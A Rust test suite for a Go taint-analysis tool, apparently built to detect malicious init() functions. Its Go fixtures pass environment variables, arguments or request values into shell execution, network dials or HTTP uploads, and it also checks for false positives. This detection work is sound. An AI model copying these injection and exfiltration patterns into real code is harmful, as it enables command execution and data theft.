#![cfg(feature = "go")]
use pyrograph::analyze;
/// Parses `source` as Go under the file name `init.go`, runs `analyze` on the
/// resulting graph, and returns the length of the analysis result.
///
/// Panics (via `expect`) if either the parse step or the analysis step fails.
fn findings_count(source: &str) -> usize {
    let parsed = pyrograph::parse::parse_go(source, "init.go");
    let graph = parsed.expect("parse Go source");
    let findings = analyze(&graph).expect("analyze graph");
    findings.len()
}
/// Expects at least one finding when `init` reads `PAYLOAD` with `os.Getenv`
/// and uses it as the command name of `exec.Command(...).Run()`.
#[test]
fn tp_init_env_getenv_to_exec_command_run() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := os.Getenv("PAYLOAD")
exec.Command(cmd).Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is passed as the
/// `-c` argument of `/bin/sh` and executed through `.Output()`.
#[test]
fn tp_init_env_getenv_to_exec_command_output() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
arg := os.Getenv("PAYLOAD")
exec.Command("/bin/sh", "-c", arg).Output()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is passed to
/// `/bin/bash -lc` and executed through `.CombinedOutput()`.
#[test]
fn tp_init_env_getenv_to_exec_command_combined_output() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
arg := os.Getenv("PAYLOAD")
exec.Command("/bin/bash", "-lc", arg).CombinedOutput()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the `exec.Command` value (built with an
/// inline `os.Getenv` argument) is stored in a variable and run afterwards.
#[test]
fn tp_init_command_var_run() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := exec.Command("/bin/sh", "-c", os.Getenv("PAYLOAD"))
cmd.Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is handed to
/// `os.StartProcess` inside `init`.
#[test]
fn tp_init_env_getenv_to_os_start_process() {
    let go_src = r#"
package main
import "os"
func init() {
name := os.Getenv("PAYLOAD")
os.StartProcess(name, nil)
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an element of `os.Environ()` is used as
/// the address argument of `net.Dial`.
#[test]
fn tp_init_environ_to_net_dial() {
    let go_src = r#"
package main
import "os"
import "net"
func init() {
env := os.Environ()
net.Dial("tcp", env[0])
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when `os.Args[1]` is concatenated into the
/// URL passed to `http.Get`.
#[test]
fn tp_init_argv_to_http_get() {
    let go_src = r#"
package main
import "os"
import "net/http"
func init() {
target := os.Args[1]
http.Get("https://example.com/?q=" + target)
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the first `flag.Args()` entry is wrapped
/// in `strings.NewReader` and sent as the body of `http.Post`.
#[test]
fn tp_init_flag_args_to_http_post() {
    let go_src = r#"
package main
import "flag"
import "net/http"
import "strings"
func init() {
args := flag.Args()
http.Post("https://example.com/upload", "text/plain", strings.NewReader(args[0]))
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the result of `ioutil.ReadFile` is passed
/// to `os.Create`.
#[test]
fn tp_init_ioutil_readfile_to_os_create() {
    let go_src = r#"
package main
import "io/ioutil"
import "os"
func init() {
data := ioutil.ReadFile("/tmp/payload")
os.Create(data)
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the result of `os.ReadFile` is written
/// out again with `os.WriteFile`.
#[test]
fn tp_init_os_readfile_to_os_writefile() {
    let go_src = r#"
package main
import "os"
func init() {
data := os.ReadFile("/tmp/payload")
os.WriteFile("/tmp/out", data, 0644)
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when `req.FormValue("cmd")` is passed as the
/// `-c` argument of `sh` and executed through `.Output()`.
#[test]
fn tp_init_http_request_formvalue_to_exec_command_output() {
    let go_src = r#"
package main
import "net/http"
import "os/exec"
func init() {
req := &http.Request{}
payload := req.FormValue("cmd")
exec.Command("sh", "-c", payload).Output()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when a value taken from `req.URL.Query()` is
/// passed to `os.StartProcess`.
#[test]
fn tp_init_http_request_query_to_start_process() {
    let go_src = r#"
package main
import "net/http"
import "os"
func init() {
req := &http.Request{}
params := req.URL.Query()
os.StartProcess(params.Get("cmd"), nil)
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the result of `os.ReadFile` is wrapped in
/// `bytes.NewBuffer` and sent as the body of `http.Post`.
#[test]
fn tp_init_http_post_from_read_file() {
    let go_src = r#"
package main
import "os"
import "net/http"
import "bytes"
func init() {
body := os.ReadFile("/tmp/data")
http.Post("https://example.com", "text/plain", bytes.NewBuffer(body))
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when a value derived from a `net.Conn`
/// variable (`conn.String()`) is passed to `os.Create`.
#[test]
fn tp_init_conn_source_to_file_sink() {
    let go_src = r#"
package main
import "net"
import "os"
func init() {
var conn net.Conn
os.Create(conn.String())
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is wrapped with
/// `reflect.ValueOf` and the resulting value's `Call` method is invoked.
#[test]
fn tp_init_reflect_call() {
    let go_src = r#"
package main
import "os"
import "reflect"
func init() {
v := reflect.ValueOf(os.Getenv("PAYLOAD"))
v.Call(nil)
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the first `flag.Args()` entry is used as
/// the address argument of `net.Dial`.
#[test]
fn tp_init_net_dial_chain_in_init() {
    let go_src = r#"
package main
import "flag"
import "net"
func init() {
t := flag.Args()
net.Dial("tcp", t[0])
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects no findings when `http.Get` is called with a constant URL only.
#[test]
fn fp_init_constant_http_get() {
    let go_src = r#"
package main
import "net/http"
func init() {
_ = http.Get("https://example.com/health")
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when `exec.Command` is run with constant arguments only.
#[test]
fn fp_init_constant_exec_run() {
    let go_src = r#"
package main
import "os/exec"
func init() {
_ = exec.Command("/bin/echo", "ok").Run()
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when an `os.Getenv` value is only compared against the
/// empty string and discarded, never reaching any call.
#[test]
fn fp_init_env_log_only() {
    let go_src = r#"
package main
import "os"
func init() {
v := os.Getenv("SAFE_TOKEN")
if v != "" {
_ = v
}
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when an `os.Getenv` value is converted with
/// `strconv.Atoi` and the only network call, `http.Get`, receives a constant URL.
///
/// The fixture's braces are balanced so the parser is given well-formed Go
/// syntax; the converted value `p` is never passed to `http.Get`.
#[test]
fn fp_init_sanitized_env_getenv_with_parseint() {
    let source = r#"
package main
import "os"
import "strconv"
import "net/http"
func init() {
v := os.Getenv("PORT")
p, _ := strconv.Atoi(v)
http.Get("https://example.com/health")
}
"#;
    assert_eq!(findings_count(source), 0);
}
/// Expects no findings when `os.Args` is only length-checked and indexed, with
/// the element discarded.
#[test]
fn fp_init_os_args_no_sink() {
    let go_src = r#"
package main
import "os"
func init() {
v := os.Args
if len(v) > 1 {
_ = v[0]
}
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when `os.Environ()` is used only to compute `len(env)`,
/// which is then discarded.
#[test]
fn fp_init_environ_used_for_local_math_only() {
    let go_src = r#"
package main
import "os"
func init() {
env := os.Environ()
x := len(env)
_ = x
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when a `net.Conn` variable is declared and discarded
/// without being passed to any call.
#[test]
fn fp_init_conn_source_no_sink() {
    let go_src = r#"
package main
import "net"
func init() {
var conn net.Conn
_ = conn
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when `Call` is invoked on a `reflect.ValueOf` built from
/// the constant `10`.
#[test]
fn fp_init_reflect_call_without_source() {
    let go_src = r#"
package main
import "reflect"
func init() {
f := reflect.ValueOf(10)
f.Call(nil)
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when the result of `ioutil.ReadFile` is discarded.
#[test]
fn fp_init_readfile_with_no_sink() {
    let go_src = r#"
package main
import "io/ioutil"
func init() {
_ = ioutil.ReadFile("/etc/config")
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when `req.FormValue("q")` is only passed through
/// `html.EscapeString` and the result is discarded.
#[test]
fn fp_init_escaped_http_request_formvalue() {
    let go_src = r#"
package main
import "net/http"
import "html"
func init() {
req := &http.Request{}
v := req.FormValue("q")
_ = html.EscapeString(v)
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when `flag.Args()` is only length-checked (with an early
/// `return`) and its first element discarded.
#[test]
fn fp_init_flag_args_not_exfiltrated() {
    let go_src = r#"
package main
import "flag"
func init() {
args := flag.Args()
if len(args) == 0 {
return
}
_ = args[0]
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects no findings when `os.Create` is called with a constant path only.
#[test]
fn fp_init_os_create_from_constant_path() {
    let go_src = r#"
package main
import "os"
func init() {
_ = os.Create("/tmp/constant.log")
}
"#;
    let reported = findings_count(go_src);
    assert_eq!(reported, 0);
}
/// Expects at least one finding when a method whose receiver is declared as
/// `net.Conn` passes `conn.String()` to `os.Create`; `init` itself is empty.
#[test]
fn tp_method_receiver_net_conn_to_file_sink() {
    let go_src = r#"
package main
import "net"
import "os"
func init() {}
func (conn net.Conn) Exfil() {
os.Create(conn.String())
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding for a file that declares two `init` functions,
/// each passing its own `os.Getenv` value to `exec.Command(...).Run()`.
///
/// Note: the assertion only requires a non-zero count; it does not check that
/// each `init` contributes a separate finding.
#[test]
fn tp_multiple_init_functions_both_tracked() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
a := os.Getenv("A")
exec.Command(a).Run()
}
func init() {
b := os.Getenv("B")
exec.Command(b).Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the `exec.Command(cmd).Run()` call on an
/// `os.Getenv` value is launched with a `go` statement.
#[test]
fn tp_goroutine_exec_command() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := os.Getenv("PAYLOAD")
go exec.Command(cmd).Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when the `exec.Command(cmd).Run()` call on an
/// `os.Getenv` value is scheduled with a `defer` statement.
#[test]
fn tp_defer_exec_command() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := os.Getenv("PAYLOAD")
defer exec.Command(cmd).Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is sent on a channel,
/// received back, and the received value is used in `exec.Command(...).Run()`.
#[test]
fn tp_channel_send_receive_to_exec() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
ch := make(chan string)
cmd := os.Getenv("PAYLOAD")
ch <- cmd
out := <-ch
exec.Command(out).Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is sent on a channel
/// and the loop variable of `for ... range ch` is used in `exec.Command`.
#[test]
fn tp_range_channel_to_exec() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
ch := make(chan string)
ch <- os.Getenv("PAYLOAD")
for cmd := range ch {
exec.Command(cmd).Run()
}
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when each element of `os.Args`, bound by a
/// `for _, arg := range` loop, is used in `exec.Command(...).Run()`.
#[test]
fn tp_range_slice_to_exec() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
for _, arg := range os.Args {
exec.Command(arg).Run()
}
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is stored in an
/// `interface{}` variable, recovered with a `.(string)` type assertion, and
/// then used in `exec.Command(...).Run()`.
#[test]
fn tp_type_assertion_to_exec() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
var data interface{} = os.Getenv("PAYLOAD")
cmd := data.(string)
exec.Command(cmd).Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value held in an
/// `interface{}` is bound by a type switch (`switch cmd := data.(type)`) and the
/// bound name is used in `exec.Command(...).Run()` inside the `string` case.
#[test]
fn tp_type_switch_alias_to_exec() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
var data interface{} = os.Getenv("PAYLOAD")
switch cmd := data.(type) {
case string:
exec.Command(cmd).Run()
}
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is sent on a channel
/// and the value received in a `select` case is used in `exec.Command`.
#[test]
fn tp_select_receive_to_exec() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
ch := make(chan string)
ch <- os.Getenv("PAYLOAD")
select {
case cmd := <-ch:
exec.Command(cmd).Run()
}
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is captured by a
/// function literal assigned to `f`, which runs `exec.Command` and is then called.
#[test]
fn tp_func_literal_exec_command() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
payload := os.Getenv("PAYLOAD")
f := func() {
exec.Command(payload).Run()
}
f()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when `os.Args` is re-sliced with `args[1:]` and
/// an element of the resulting slice is used in `exec.Command(...).Run()`.
#[test]
fn tp_slice_expression_to_exec() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
args := os.Args
part := args[1:]
exec.Command(part[0]).Run()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is captured by a
/// function literal that runs `exec.Command` and is launched with `go`.
#[test]
fn tp_go_func_literal_exec_command() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
payload := os.Getenv("PAYLOAD")
go func() {
exec.Command(payload).Run()
}()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Expects at least one finding when an `os.Getenv` value is captured by a
/// function literal that runs `exec.Command` and is scheduled with `defer`.
#[test]
fn tp_defer_func_literal_exec_command() {
    let go_src = r#"
package main
import "os"
import "os/exec"
func init() {
payload := os.Getenv("PAYLOAD")
defer func() {
exec.Command(payload).Run()
}()
}
"#;
    let hits = findings_count(go_src);
    assert!(hits > 0);
}
/// Parses a fixture in which `Outer` embeds `Inner` (under the file name
/// `main.go`) and checks that the parsed graph has a node named `Inner`.
#[test]
fn struct_embedding_creates_node() {
    let go_src = r#"
package main
type Inner struct { data string }
type Outer struct { Inner }
func init() {}
"#;
    let graph = pyrograph::parse::parse_go(go_src, "main.go").expect("parse Go source");
    let has_inner_node = graph.nodes().iter().any(|node| node.name == "Inner");
    assert!(has_inner_node);
}